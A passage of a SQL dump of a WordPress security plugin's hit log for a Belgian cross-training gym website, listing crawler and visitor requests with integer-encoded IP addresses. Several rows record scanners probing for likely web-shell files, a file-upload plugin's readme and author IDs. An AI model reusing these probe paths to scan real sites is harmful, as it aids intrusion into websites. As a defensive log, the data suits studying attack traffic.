(74826, 1497056342.381181, 1091807106, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-xmlrpc.php', '', 'Mozilla/5.0 (Linux; Android 4.1.1; SCH-I605 Build/JRO03C) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Mobile Safari/535.19'),
(74827, 1497056345.895491, 1091807106, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/Xudfel.php', '', 'Mozilla/5.0 (Linux; Android 4.1.1; SCH-I605 Build/JRO03C) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Mobile Safari/535.19'),
(74828, 1497056359.376216, 1091807106, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/dep.php', '', 'Mozilla/5.0 (Linux; Android 4.1.1; SCH-I605 Build/JRO03C) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Mobile Safari/535.19'),
(74829, 1497056362.159293, 1091807106, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/indexx.php', '', 'Mozilla/5.0 (Linux; Android 4.1.1; SCH-I605 Build/JRO03C) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Mobile Safari/535.19'),
(74830, 1497056365.730765, 1091807106, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/axt.php', '', 'Mozilla/5.0 (Linux; Android 4.1.1; SCH-I605 Build/JRO03C) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Mobile Safari/535.19'),
(74831, 1497056370.121775, 1091807106, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/nimas.php', '', 'Mozilla/5.0 (Linux; Android 4.1.1; SCH-I605 Build/JRO03C) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Mobile Safari/535.19'),
(74832, 1497056374.693903, 1091807106, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/Dducfj.php', '', 'Mozilla/5.0 (Linux; Android 4.1.1; SCH-I605 Build/JRO03C) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Mobile Safari/535.19'),
(74833, 1497056378.056515, 1091807106, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/azra.php', '', 'Mozilla/5.0 (Linux; Android 4.1.1; SCH-I605 Build/JRO03C) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Mobile Safari/535.19'),
(74834, 1497056387.057158, 1091807106, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/language.php', '', 'Mozilla/5.0 (Linux; Android 4.1.1; SCH-I605 Build/JRO03C) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Mobile Safari/535.19'),
(74835, 1497058823.531457, 1314254639, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/website-contact-form-with-file-upload/readme.txt', '', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0)'),
(74836, 1497061932.884909, 3065287714, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-includes/css/style.css.php', 'http://crosstrainingcenter.be/wp-includes/css/style.css.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(74837, 1497068029.973453, 3475901897, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74838, 1497068030.002769, 3475901897, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74839, 1497069073.243479, 3475901784, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74840, 1497072846.846013, 2509963186, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(74841, 1497077254.306849, 1539836988, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/class-wp-upgrade.php', 'http://www.crosstrainingcenter.be/wp-includes/class-wp-upgrade.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(74842, 1497078947.543711, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)'),
(74843, 1497078948.043618, 1538656104, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74844, 1497078948.536267, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74845, 1497078949.106304, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74846, 1497078949.644617, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74847, 1497078950.117514, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74848, 1497078950.573837, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74849, 1497078951.082583, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(74850, 1497078951.733411, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74851, 1497078952.217269, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74852, 1497078952.699112, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74853, 1497078953.221764, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74854, 1497078953.774567, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74855, 1497078954.240261, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74856, 1497079328.021043, 2366148111, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74857, 1497079332.957439, 1570674771, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74858, 1497085501.783783, 1600959233, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74859, 1497085778.205079, 2503519569, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(74860, 1497089516.207680, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)'),
(74861, 1497089516.720604, 1538656104, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74862, 1497089517.684122, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74863, 1497089518.239302, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74864, 1497089518.824585, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74865, 1497089519.366200, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(74866, 1497089520.324069, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74867, 1497089521.977608, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(74868, 1497089522.978118, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74869, 1497089523.464582, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74870, 1497089525.567609, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74871, 1497089528.740552, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74872, 1497089529.223120, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74873, 1497089529.750256, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74874, 1497092772.183461, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74875, 1497095915.711165, 2745986199, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/logo_img.php', 'http://www.crosstrainingcenter.be/wp-includes/logo_img.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(74876, 1497102432.309093, 872366373, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(74877, 1497102445.565929, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(74878, 1497107556.307090, 758593298, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(74879, 1497107561.299030, 758593298, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(74880, 1497107563.093739, 758593298, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(74881, 1497107565.870132, 758593298, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(74882, 1497107570.871090, 758593298, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(74883, 1497107581.093615, 758593298, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', 'http://www.crosstrainingcenter.be/?page_id=266', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(74884, 1497107586.007890, 758593298, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(74885, 1497107590.801587, 758593298, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(74886, 1497107596.496931, 758593298, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(74887, 1497110902.275874, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74888, 1497111894.073937, 2637637409, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74889, 1497111894.354577, 2637637409, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74890, 1497123167.377637, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74891, 1497123167.998344, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74892, 1497123168.860394, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74893, 1497123169.428522, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74894, 1497123169.918993, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74895, 1497123170.458620, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74896, 1497123171.119321, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74897, 1497123171.673995, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74898, 1497123172.161106, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74899, 1497123172.635108, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74900, 1497123173.127224, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74901, 1497124940.839806, 2996488251, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74902, 1497124944.914385, 1570674758, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74903, 1497124946.363725, 621375750, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74904, 1497125853.176035, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74905, 1497127688.030278, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74906, 1497129326.524709, 3645214533, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/Robots/2.0; +http://go.mail.ru/help/robots)'),
(74907, 1497129335.452578, 3645214526, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/Robots/2.0; +http://go.mail.ru/help/robots)'),
(74908, 1497129337.039207, 3645214533, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/Robots/2.0; +http://go.mail.ru/help/robots)'),
(74909, 1497131654.306946, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74910, 1497137454.288439, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74911, 1497145734.620581, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74912, 1497147253.985790, 2499535434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'AwarioRssBot/1.0 (+https://awario.com/bots.html; bots@awario.com)'),
(74913, 1497155113.097276, 786801762, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SemrushBot/1.2~bl; +http://www.semrush.com/bot.html)'),
(74914, 1497156121.768394, 1123631171, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74915, 1497156122.711435, 1123631300, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74916, 1497158570.093053, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74917, 1497159815.526744, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74918, 1497162582.773603, 1123631300, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74919, 1497163811.977255, 3652617401, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(74920, 1497172746.177271, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74921, 1497176055.193513, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74922, 1497177321.490250, 1123631300, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Googlebot-Image/1.0'),
(74923, 1497177756.880476, 872366346, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/author/admin/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(74924, 1497179435.623607, 1123631300, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74925, 1497179435.763722, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74926, 1497182758.269926, 136172254, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(74927, 1497183310.002344, 1114560586, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/ytt.php', 'http://crosstrainingcenter.be/ytt.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(74928, 1497183511.887465, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74929, 1497183512.372296, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74930, 1497183512.790764, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74931, 1497183513.226526, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74932, 1497183513.741138, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74933, 1497183514.284567, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74934, 1497183514.881100, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74935, 1497183515.338512, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74936, 1497183515.858863, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74937, 1497183516.271861, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74938, 1497183516.747221, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74939, 1497183923.166664, 2637637395, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74940, 1497187896.157272, 1374824265, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74941, 1497187906.237820, 1374824265, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74942, 1497187919.100355, 1374824265, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74943, 1497189998.239189, 1374824265, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74944, 1497190351.434349, 1570674744, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74945, 1497197289.888317, 2032808987, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', ''),
(74946, 1497197291.490683, 2032808987, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/?author=2', '', ''),
(74947, 1497197292.249461, 2032808987, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/?author=4', '', ''),
